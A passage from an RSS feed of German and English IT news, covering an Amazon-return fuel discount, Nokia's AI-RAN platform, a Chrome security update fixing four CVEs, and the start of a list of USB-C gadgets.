<pubDate>Fri, 24 Jul 2026 10:18:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Amazon-Kunden können sich derzeit einen Tankrabatt sichern, wenn sie ihre Retouren an ausgewählten Tankstellen abgeben. Für jede erfolgreich abgewickelte Rücksendung erhalten Kunden einen Gutschein über <strong>5 Cent Rabatt pro Liter Kraftstoff</strong>. Die Aktion stammt vom <a href="https://www.enilive.de/alle-services/zusatzservices/amazon-locker/amazon-kunden-profitieren-doppelt" target="_blank" rel="noreferrer noopener">Tankstellenbetreiber Enilive</a> und läuft noch bis zum 15. Oktober 2026.</p>



<p>Wer ohnehin regelmäßig bei Amazon bestellt und gelegentlich Artikel zurückschickt, kann den Rabatt ohne zusätzlichen Aufwand mitnehmen. Allerdings gibt es einige Bedingungen, die Verbraucher kennen sollten.</p>



<h2 class="wp-block-heading">So funktioniert die Aktion</h2>



<p>Die Rückgabe wird wie gewohnt im Amazon-Konto gestartet. Wird während des Retourenprozesses eine teilnehmende Enilive-, Eni- oder Agip-Tankstelle als Rückgabeort angeboten, können Sie diese auswählen. Die teilnehmenden Tankstellen werden <a href="https://enimultic.my.salesforce.com/sfc/p/#09000005P6j7/a/dY000000njgj/MFTAGCtJntTzAgp2xfBPhLBow.Eqg8jC9Bvzkj8LclY" target="_blank" rel="noreferrer noopener">hier</a> aufgelistet. </p>



<p>Anschließend bringen Sie die Retoure zur Tankstelle und lassen dort den von Amazon bereitgestellten QR-Code beziehungsweise Rückgabecode scannen. Nach der Annahme des Pakets erhalten Sie direkt einen Rabatt-Coupon für Ihren nächsten Tankvorgang.</p>



<p>Nach Angaben von Enilive ist für viele Rücksendungen weder ein ausgedrucktes Versandlabel noch ein zusätzlicher Karton erforderlich. In vielen Fällen reicht die Originalverpackung aus. Fehlt diese, kann die Tankstelle teilweise eine Versandtasche bereitstellen.</p>



<h2 class="wp-block-heading">Wie viel können Sie sparen?</h2>



<p>Der Gutschein reduziert den Kraftstoffpreis um 5 Cent pro Liter. Allerdings gelten Ober- und Untergrenzen:</p>



<ul class="wp-block-list">
<li>Mindestabnahme: 30 Liter Benzin oder Diesel</li>



<li>Maximal rabattierte Menge: 80 Liter</li>



<li>Höchste mögliche Ersparnis: 4 Euro pro Tankvorgang</li>
</ul>



<p>Bei einer Tankfüllung von 50 Litern beträgt die Ersparnis beispielsweise 2,50 Euro. Wer 80 Liter tankt, spart maximal 4 Euro.</p>



<p>Der Coupon kann erst beim nächsten Tankvorgang eingelöst werden.</p>



<h2 class="wp-block-heading">Diese Einschränkungen gelten</h2>



<p>Der Tankrabatt lässt sich nicht mit anderen Vergünstigungen kombinieren. Laut den Aktionsbedingungen ist außerdem keine Einlösung bei Zahlung mit Tankkarten möglich. Pro Tankvorgang kann nur ein Gutschein verwendet werden.</p>



<p>Die Aktion läuft bis einschließlich 15. Oktober 2026.</p>



<h2 class="wp-block-heading">Nicht jede Tankstelle macht mit</h2>



<p>Wichtig: Die Kooperation gilt nicht an allen Enilive-, Eni- und Agip-Stationen. Nach Angaben des Unternehmens nehmen bundesweit 132 Tankstellen teil.</p>



<p>Ob eine Station in Ihrer Nähe dabei ist, erkennen Sie entweder direkt während des Amazon-Retourenprozesses oder über die von <a href="https://enimultic.my.salesforce.com/sfc/p/#09000005P6j7/a/dY000000njgj/MFTAGCtJntTzAgp2xfBPhLBow.Eqg8jC9Bvzkj8LclY" target="_blank" rel="noreferrer noopener">Enilive veröffentlichte Liste der teilnehmenden Standorte.</a></p>



<h2 class="wp-block-heading">Lohnt sich der Tankrabatt wirklich?</h2>



<p>Im Alltag dürfte sich die Aktion primär dann lohnen, wenn sich eine teilnehmende Tankstelle ohnehin auf Ihrem Weg befindet. Wer extra für die Retoure oder den Rabatt einen Umweg fährt, kann den Preisvorteil durch zusätzlichen Kraftstoffverbrauch schnell wieder verlieren.</p>



<p>Auch ein Preisvergleich bleibt sinnvoll. Selbst mit 5 Cent Rabatt kann eine teilnehmende Tankstelle teurer sein als andere Anbieter in der Umgebung. Der Gutschein ist deshalb eher ein netter Zusatzbonus für ohnehin geplante Retouren als ein Garant für die günstigste Tankfüllung.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why enterprises should care about Nokia’s AI-RAN platform]]></title>
<description><![CDATA[Earlier this month, Nokia provided an AI-RAN platform update that brings an AI-native and programmable compute which is projected to double spectral efficiency by 2028. This increases speed, but more importantly, it can allow mobile operators to create some actual monetization beyond connectivity...]]></description>
<link>https://tsecurity.de/de/3690985/it-security-nachrichten/why-enterprises-should-care-about-nokias-ai-ran-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690985/it-security-nachrichten/why-enterprises-should-care-about-nokias-ai-ran-platform/</guid>
<pubDate>Fri, 24 Jul 2026 10:13:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Earlier this month, Nokia provided an AI-RAN platform update that brings an AI-native and programmable compute which is projected to double spectral efficiency by 2028. This increases speed, but more importantly, it can allow mobile operators to create some actual monetization beyond connectivity.</p>



<p class="wp-block-paragraph">With this release, Nokia is introducing what it calls the industry’s first commercial AI-RAN platform, built on its AI‑native anyRAN software and Nvidia’s Aerial AI-RAN stack running on merchant GPU-based accelerated computing. The company is already seeing more than 20% gains in spectral efficiency from AI-driven radio algorithms, with a roadmap to reach 50% by 2027 and more than 100% by 2028, effectively doubling capacity on existing spectrum in dense cells.</p>



<p class="wp-block-paragraph">Legacy RAN infrastructure enables connectivity but not much beyond that. The AI-RAN makes the network intelligent and extends AI into the physical world, enabling telcos to get more from their infrastructure investments, including <a href="https://www.networkworld.com/article/4128115/is-private-5g-6g-important-after-all.html">providing a path to 6G</a>. The partnership with Nvidia brings CUDA and AI into mobile environments.</p>



<p class="wp-block-paragraph">For <em>Network World</em> readers, the headline isn’t just that Nokia got to market first with AI‑RAN—it’s that the company is using AI and GPUs to break the historical coupling between radio performance and custom silicon refresh cycles, and to turn the RAN into an application platform.</p>



<h2 class="wp-block-heading">What AI-RAN actually is</h2>



<p class="wp-block-paragraph">At a technical level, Nokia’s AI‑RAN is a software‑defined baseband architecture that runs Layer 1/Layer 2 RAN functions and AI models on accelerated compute, primarily GPUs, instead of being locked into fixed‑function ASICs. <a href="https://www.linkedin.com/in/cheers/">Udayan Mukherjee</a>, Nokia’s CTO for RAN and core, summarized the vision in the <a href="https://www.networkworld.com/article/4200815/AI-RAN-analyst-briefing-20260714_095948-Meeting-Recording-2-_1_otter_ai_transcript.txt">analyst briefing</a>: “AI‑RAN is essentially a platform that turns the radio network into a true AI‑native programmable platform… one software detached from the hardware, defining flexible hardware deployment configurations, including part of the AI grid.”</p>



<p class="wp-block-paragraph">Several pillars stand out:</p>



<ul class="wp-block-list">
<li>AI‑native design: Algorithms move from traditional linear models to increasingly nonlinear techniques (e.g., advanced channel estimation, deep receivers/transmitters, RKHS-based methods), which demand tensor-heavy compute best delivered by GPUs.</li>



<li>Software-defined RAN: The same anyRAN software stack runs across different hardware configurations—plug‑in cards, standalone AI‑RAN nodes, and COTS/cloud RAN—so innovation comes via software releases rather than baseband card swaps.</li>



<li>Programmable “D‑apps” layer: Nokia is pushing a new real‑time E3 interface from Layer 1/2 into an application layer for distributed apps (D‑apps) that can tap IQ samples, channel estimation and scheduling data for use cases such as sensing and location services.</li>



<li>Crucially, this isn’t meant to replace all custom silicon overnight. Mukherjee was explicit: “We are not dropping the purpose‑built product… but we want to also get to merchant silicon, because that’s the future as we want to develop bigger models and AI elements and value‑added services on top of it.” The result is a hybrid era where AI‑accelerated platforms coexist with existing basebands but begin to shoulder the most compute‑intensive workloads.</li>
</ul>



<h2 class="wp-block-heading">Why AI-RAN matters for operators</h2>



<p class="wp-block-paragraph">Nokia and its early operator partners are trying to solve three perennial problems: finite spectrum, changing traffic patterns, and the drag of hardware refresh cycles.</p>



<p class="wp-block-paragraph">First, spectrum constraints. <a href="https://www.linkedin.com/in/aji-ed/">Aji Ed</a>, Nokia’s head of AI‑RAN and cloud RAN, called spectrum “the first constraint everybody has,” noting that operators have paid “huge amount of money” for bands and now need to “get up to the 2x spectrum” in terms of usable capacity. By running more complex AI models for multi‑user MIMO pairing, channel estimation, carrier aggregation and deep receiver/transmitter functions on GPUs, Nokia believes it can unlock those gains where traditional platforms simply run out of compute headroom.</p>



<p class="wp-block-paragraph">Second, traffic is shifting. Generative AI and distributed inference workloads are driving more uplink-heavy, latency‑sensitive patterns that current RANs weren’t designed for. AI‑RAN’s ability to adapt scheduling, beamforming and resource allocation dynamically via AI models deployed at the baseband is meant to keep up with this shift.</p>



<p class="wp-block-paragraph">Third, innovation cadence. In Ed’s words, “hardware upgrades can’t keep up with the innovation… we can’t really have a silicon refresh cycle linked with every three‑year cycle.” Nokia’s subscription‑based software model is designed to deliver new AI algorithms, spectral‑efficiency improvements and network optimization features continuously, without requiring “forklift” hardware replacements.</p>



<p class="wp-block-paragraph">For operators, the message is attractive: comparable TCO and power to existing basebands, “no hardware premium” for GPU adoption, but higher capacity and a path to new services. Nokia told analysts it has reached performance, price and energy efficiency parity between its custom GridShark silicon and GPU-based systems, while moving the baseband roadmap to merchant silicon.</p>



<h2 class="wp-block-heading">Nokia’s differentiation strategy</h2>



<p class="wp-block-paragraph">Every major RAN vendor is talking about AI‑enhanced radio, but Nokia is drawing a line between incremental gains and what it claims is a platform shift. When asked why its 2x spectral efficiency ambition is so much higher than the ~20% numbers competitors discuss, Ed pointed to the underlying architecture: “We are able to bring much more complex algorithms into this compute infrastructure… all of these require much higher compute, which is exactly what is coming from the accelerated computing.”</p>



<p class="wp-block-paragraph">Several differentiators emerge:</p>



<ul class="wp-block-list">
<li>Aggressive spectral roadmap: Nokia is targeting 1.5x by 2027 and 2x by 2028, across TDD massive MIMO and FDD scenarios, with a feature roadmap built jointly with Nvidia and other partners.</li>



<li>Single code base, three deployment paths: The same anyRAN software stack runs on (1) a GPU‑powered AirScale capacity plug‑in card, (2) a high‑capacity standalone AI‑RAN node, and (3) GPU‑based COTS/cloud RAN servers. This lets operators modernize “at their own pace” and mix brownfield evolution with greenfield AI-native deployments.</li>



<li>Open ecosystem with D‑apps: Nokia is leaning into ORAN compliance (front‑haul, O1/O2) and actively championing the E3 interface and D‑apps concept within ORAN and AI‑RAN alliances, with Bell Labs and at least two external partners already building sensing and location applications on the platform.</li>



<li>Software subscription tied to value: The commercial model builds on existing software subscriptions but ties pricing more explicitly to delivered value, such as spectral efficiency improvements and new AI services, rather than pure license metrics.</li>
</ul>



<p class="wp-block-paragraph">Mukherjee emphasized the openness angle in the briefing: “We see a lot of third‑party applications, whether it’s improving spectral efficiency or location service or sensing, can be developed on this platform… any AI‑powered services from us in Nokia or from ecosystems can be actually developed on top of it.” For operators burned by closed optimization stacks, that’s a notable pivot.</p>



<h2 class="wp-block-heading">How AI-RAN unlocks new revenue</h2>



<p class="wp-block-paragraph">Most operators will sign off on AI‑RAN if the capacity and TCO story holds, but the more strategic question is monetization beyond connectivity. Nokia’s spokespeople spent considerable time on this in the analyst call, pointing to several classes of services that are difficult or impossible to deliver without AI running in the RAN itself.</p>



<p class="wp-block-paragraph">Examples include:</p>



<ul class="wp-block-list">
<li>Integrated sensing: Turning the RAN into a distributed sensor grid that can support applications such as 3D mapping, gesture recognition and environmental monitoring, using the same RF infrastructure. Mukherjee noted, “We have at least two to three partners developing sensing applications on top of it… as well as two other companies developing location services.”</li>



<li>Physical AI and location services: For factories, logistics hubs and smart cities, AI‑RAN can provide high‑precision positioning and real‑time telemetry for robots, drones and autonomous systems by fusing radio data and AI models at the edge.</li>



<li>Distributed AI infrastructure: Operators exploring “AI‑native cities” can use AI‑RAN nodes and COTS GPU servers as a distributed inference fabric for applications that need tight latency to endpoints—think AR/VR offload, real‑time video analytics or interactive generative AI experiences.</li>



<li>Premium connectivity tiers: With fine‑grained, AI‑driven control over uplink/downlink scheduling and QoS, operators can create differentiated SLAs for enterprise slices, mission‑critical IoT and AI workloads, charging for guaranteed performance rather than best‑effort connectivity.</li>
</ul>



<p class="wp-block-paragraph">Ed framed the opportunity as a continuum: Superior connectivity from 2x spectral efficiency creates “space for new AI workloads and other use cases,” while the D‑apps ecosystem and subscription model provide a mechanism to package and sell those capabilities. In practice, that could look like:</p>



<ul class="wp-block-list">
<li>Industrial sensing-as-a-service, where Nokia and partners supply D‑apps for integrated sensing and positioning, and operators monetize them per site or per device.</li>



<li>Network‑exposed APIs for inference, location and RF sensing, integrated into operators’ broader network API portfolios as they pursue “network-as-a-platform” strategies.</li>



<li>Sector‑specific AI‑native services, such as stadium analytics, transportation corridor monitoring, or drone traffic management, built by ISVs on top of Nokia’s exposed E3 data.</li>
</ul>



<p class="wp-block-paragraph">For operators that already use Nokia’s MantaRay and SMO stacks for cross‑network optimization, AI‑RAN essentially becomes the local real‑time execution environment, while R‑apps/X‑apps continue to orchestrate macro-level behaviors. Mukherjee described this layered architecture as “DU and CU on the platform running D‑apps using E3, interfacing to X‑apps and R‑apps through E2SM and connecting to the overall management system/SMO for lifecycle management.”</p>



<h2 class="wp-block-heading">Adoption path and reality check</h2>



<p class="wp-block-paragraph">Nokia is not promising instant transformation. AI‑RAN pilots are slated for late 2026, with commercial availability on card‑based systems in 2027 and AirScale-based systems around 2028, all driven from a single software stack that supports 4G, 5G and is upgradable to 6G. The company already has trials and collaborations underway with T‑Mobile US, SoftBank, Indosat Ooredoo Hutchison, BT, Elisa, Vodafone, Orange, NTT Docomo, Deutsche Telekom and others.</p>



<p class="wp-block-paragraph">There are still open questions around 3GPP vs ORAN standardization of E3, the maturity of the D‑apps ecosystem, and how operators will digest yet another subscription layer tied to radio software. But Nokia’s move puts a stake in the ground: in the AI era, the RAN is not just a throughput engine; it’s a programmable AI computer that can be monetized.</p>



<p class="wp-block-paragraph">For <em>Network World</em> readers evaluating vendor roadmaps, this launch suggests a clear directional change. If Nokia hits its targets, AI‑RAN could mark the point where baseband becomes less about hardware SKUs and more about an AI platform strategy—one where spectral efficiency and new services are rolled out at “software speed,” as Ed described it, rather than at the pace of the next card generation.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mit dem zweiten Chrome-Update der Woche schließt Google weitere Browser-Lücken]]></title>
<description><![CDATA[In den neuen Chrome-Versionen 150.0.7871.186/187 für Windows und macOS sowie 150.0.7871.186 für Linux vom 23. Juli haben die Entwickler vier Schwachstellen beseitigt. Keine der geschlossenen Lücken wird laut Google bislang für Angriffe ausgenutzt. Diese Aktualisierung folgt nur zwei Tage nach dem...]]></description>
<link>https://tsecurity.de/de/3690961/it-nachrichten/mit-dem-zweiten-chrome-update-der-woche-schliesst-google-weitere-browser-luecken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690961/it-nachrichten/mit-dem-zweiten-chrome-update-der-woche-schliesst-google-weitere-browser-luecken/</guid>
<pubDate>Fri, 24 Jul 2026 10:04:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In den neuen Chrome-Versionen 150.0.7871.186/187 für Windows und macOS sowie 150.0.7871.186 für Linux vom 23. Juli haben die Entwickler vier Schwachstellen beseitigt. Keine der geschlossenen Lücken wird laut Google bislang für Angriffe ausgenutzt. Diese Aktualisierung folgt nur zwei Tage nach dem vorherigen Chrome-Update. Die Hersteller anderer Chromium-basierter Browser werden in Kürze nachziehen.</p>



<p>Im <a href="https://chromereleases.googleblog.com/" target="_blank" rel="noreferrer noopener">Chrome Release Blog</a> führt Daniel Yip vier beseitigte Sicherheitslücken auf, die Google alle selbst entdeckt hat. Die Schwachstellen CVE-2026-16804 bis -16807 sind als hohes Risiko ausgewiesen. Drei der vier Anfälligkeiten sind Use-after-free-Lücken (UAF) in verschiedenen Komponenten, namentlich Input, Blink und WebMCP (Web Model Context Protocol, eine Schnittstelle für „KI“-Agenten). Das Problem bei CVE-2026-16807 ist hingegen ein unzulässiger Schreibzugriff auf Speicherbereiche außerhalb der vorgesehenen Grenzen (out of bounds write) in der Codecs-Komponente.</p>



<p><a href="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" target="_blank" rel="noreferrer noopener">▶Die neuesten Sicherheits-Updates</a></p>



<p>Erst am 21. Juli hat Google ein Update bereitgestellt und damit <a href="https://www.pcwelt.de/article/3196305/google-behebt-hochriskante-schwachstellen-in-chrome.html" data-type="link" data-id="https://www.pcwelt.de/article/3196305/google-behebt-hochriskante-schwachstellen-in-chrome.html" target="_blank" rel="noreferrer noopener">12 Sicherheitslücken geschlossen</a>. In aller Regel aktualisiert sich Chrome automatisch, wenn eine neue Version verfügbar ist. Mit dem Menü-Eintrag <em>» Hilfe » Über Google Chrome</em> können Sie die Update-Prüfung manuell anstoßen.</p>



<p>Google hat am 23. Juli auch Chrome für Android 150.0.7871.181 veröffentlicht. In der Android-Version sind die gleichen Schwachstellen beseitigt wie in den Desktop-Ausgaben. Der Extended Stable Channel für Windows und macOS enthält nun die Chromium-Version 150.0.7871.187. Die Freigabe der Chrome-Version 151 ist für den 28. Juli geplant.</p>



<p><strong>Tipp:</strong> Unabhängig davon, dass Sie Ihren Browser stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zusätzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-Lösungen stellen wir in „<a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">Die besten Antivirus-Programme im Test: So schützen Sie Ihren Windows-PC</a>“ vor. Falls Sie großen Wert auf anonymes Surfen legen, <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">sind wiederum gute VPN-Programme einen Blick wert.</a></p>



<h2 class="wp-block-heading toc">Andere Chromium-basierte Browser</h2>



<p>Die Hersteller anderer auf Chromium basierender Browser sind nun wieder gefordert, mit Updates nachzuziehen. Microsoft Edge, Brave und Vivaldi sind auf dem Sicherheitsstand vor dem zweiten Chrome-Update dieser Woche. Opera hat zwar am 23. Juli ein Bugfix-Update veröffentlicht, ist jedoch mit seiner Browser-Version 133 in puncto Sicherheit weiterhin auf einem Holzweg unterwegs. Darin ist die veraltete Chromium-Ausgabe 149.0.7827.201 vom 25. Juni verbaut und für Chromium 149 liefert Google seitdem keine Updates mehr.</p>



<div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained">
<p><strong>Chromium-basierte Browser in der Übersicht:</strong></p>



<figure class="wp-block-table is-style-stripes"><table class="has-fixed-layout"><thead><tr><th><strong>Browser</strong></th><th>Version</th><th>Chromium-Version</th><th>abgesichert?</th></tr></thead><tbody><tr><td><a href="https://www.pcwelt.de/article/1135017/google-chrome.html" target="_blank" rel="noreferrer noopener" title="Download">Google Chrome ↓</a></td><td>150.0.7871.182</td><td>150.0.7871.182</td><td>🟢</td></tr><tr><td><a href="https://www.pcwelt.de/article/1191500/brave-browser.html" target="_blank" rel="noreferrer noopener" title="Download">Brave ↓</a></td><td>1.92.143</td><td>150.0.7871.182</td><td>🟡</td></tr><tr><td>Microsoft Edge</td><td>150.0.4078.96</td><td>150.0.7871.182</td><td>🟡</td></tr><tr><td><a href="https://www.pcwelt.de/article/1082991/browser-opera.html" target="_blank" rel="noreferrer noopener" title="Download">Opera One ↓</a></td><td>133.0.5932.85</td><td>149.0.7827.201</td><td>🟠</td></tr><tr><td><a href="https://www.pcwelt.de/article/1151272/vivaldi.html" target="_blank" rel="noreferrer noopener" title="Download">Vivaldi ↓</a></td><td>8.1.4087.56 </td><td>150.0.7871.186</td><td>🟡</td></tr></tbody></table><figcaption class="wp-element-caption"><em>Chromium-basierte Browser – Stand: 23.07.2026</em></figcaption></figure>
</div></div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[13 clevere USB-C-Gadgets, die viel mehr können, als nur Ihr Handy aufzuladen]]></title>
<description><![CDATA[Ich weiß nicht, wie es in Ihren Schubladen aussieht, aber meine sind voll mit Kabeln, die ich wahrscheinlich nie wieder benutzen werde, weil die Technologie sich ziemlich weiterentwickelt hat. Zum Glück scheint sich USB-C durchzusetzen, denn es gibt keinen falschen Weg, diese Dinger anzuschließen...]]></description>
<link>https://tsecurity.de/de/3690951/it-nachrichten/13-clevere-usb-c-gadgets-die-viel-mehr-koennen-als-nur-ihr-handy-aufzuladen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690951/it-nachrichten/13-clevere-usb-c-gadgets-die-viel-mehr-koennen-als-nur-ihr-handy-aufzuladen/</guid>
<pubDate>Fri, 24 Jul 2026 10:03:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ich weiß nicht, wie es in Ihren Schubladen aussieht, aber meine sind voll mit Kabeln, die ich wahrscheinlich nie wieder benutzen werde, weil die Technologie sich ziemlich weiterentwickelt hat. Zum Glück scheint sich USB-C durchzusetzen, denn es gibt keinen falschen Weg, diese Dinger anzuschließen. Aber nicht nur Smartphones, Tablets und Laptops verwenden diese Anschlüsse, sondern auch eine lange Liste von Gadgets.</p>



<p>Wir haben den Markt nach versteckten Perlen durchforstet: Gadgets, bei denen Sie denken werden: “Wow, ich wusste gar nicht, dass ich das brauche, aber es wird mein Leben so viel einfacher machen!” Schauen wir uns also an, mit welchen coolen Geräten Sie Ihre Typ-C-Kabel und -Anschlüsse nutzen können.</p>



<h2 class="wp-block-heading">heat it Insektenstichheiler</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b7d445"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/06/PC-Welt-Aufmacher-57.jpg?quality=50&amp;strip=all" alt="heat it - Insektenstichheiler für dein Smartphone - Chemiefreie Behandlung von Juckreiz &amp; Schmerz mit konzentrierter Wärme - für Android mit USB-C (nicht für iPhone 15 geeignet) Amazon Angebot" class="wp-image-2376376" width="1200" height="800" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PCWelt/heat it/Amazon</p></div>



<p>Wer im Sommer oder Urlaub oft von Mücken geradezu heimgesucht wird, wird sich besonders über dieses geniale Gadget freuen: Dieses winzige Gerät, das sich einfach per USB-C mit Ihrem Smartphone verbinden lässt, kann mit gezielter Wärme den Juckreiz von Stichen und Insektenbissen deutlich reduzieren.</p>



<p>Ähnlich wie größere Varianten, etwa diesen hier <a href="https://www.pcwelt.de/article/2420282/beurer-insektenstichheiler-br-90-im-test-rasche-hilfe-gegen-juckreiz.html" target="_blank" rel="noreferrer noopener">von Beurer</a>, muss man den kleinen <a href="https://www.amazon.de/dp/B0D26GWWD1?th=1&amp;tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Stichheiler von heat it</a> einfach nur per App aufladen und dann auf den Stich halten. Die Hitze erledigt dann den Rest und zersetzt die Proteine, die im Mückenstich dafür sorgen, dass die Stelle anschwillt, juckt und schmerzt. Ein echtes Must-have für den Sommer, und es kostet nicht mal 25 Euro.</p>



<h2 class="wp-block-heading">Mini-Ventilator</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b7e317"}' data-wp-interactive="core/image" class="wp-block-image size-full is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/KIMMOO-3-in-1-Turbo-Handventilator.jpg?quality=50&amp;strip=all" alt="KIMMOO 3-in-1 Turbo-Handventilator" class="wp-image-3198532" width="1048" height="916" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">KIMMOO / Amazon / PC-WELT</p></div>



<p>Ziemlich genial sind auch diese kleinen Ventilatoren, die man im Sommer einfach in der Hosentasche mitnehmen und bei Bedarf schnell einsetzen kann. Wer schon einmal bei 30 Grad in einer vollen S-Bahn saß und sich zumindest ein wenig frische Luft gewünscht hat, der wird dieses Gadget lieben.</p>



<p>Der <a href="https://www.amazon.de/KIMMOO-Tragbarer-1-Turbo-Ventilator-USB-wiederaufladbarer-Mini-Handventilator/dp/B0DRNQKTH9?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Mini-Ventilator für unter 20 Euro</a> mit USB-C-Ladeanschluss kann ganz einfach über <a href="https://www.pcwelt.de/article/1167895/vergleich-die-besten-powerbanks-im-test-4500-bis-30000-mah.html" target="_blank" rel="noreferrer noopener">Powerbanks</a>, Computer, Laptops oder USB-Ladegeräte betrieben werden. Es gibt aber noch kleinere und günstigere <a href="https://www.amazon.de/Mini-Handy-Fan-Handy-Fan-Taschen-Fan-Reise-Ventilatoren-Smartphone-Tablet-Typ-C-Schnitts-Wei%C3%9F/dp/B0BVMZBVD6/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Ventilatoren</a>, die man direkt ans Handy anschließen kann, und gerade mal 2-3 Euro pro Stück kosten. Diese sorgen aber auch für einen weniger starken Luftstrom, daher würden wir eher die erste Variante empfehlen.</p>



<h2 class="wp-block-heading">USB-C zu HDMI Adapter</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b7f001"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/09/Anker-USBC-to-HDMI-adapter.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Anker USB-C to HDMI adapter" class="wp-image-2905503" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Anker</p></div>



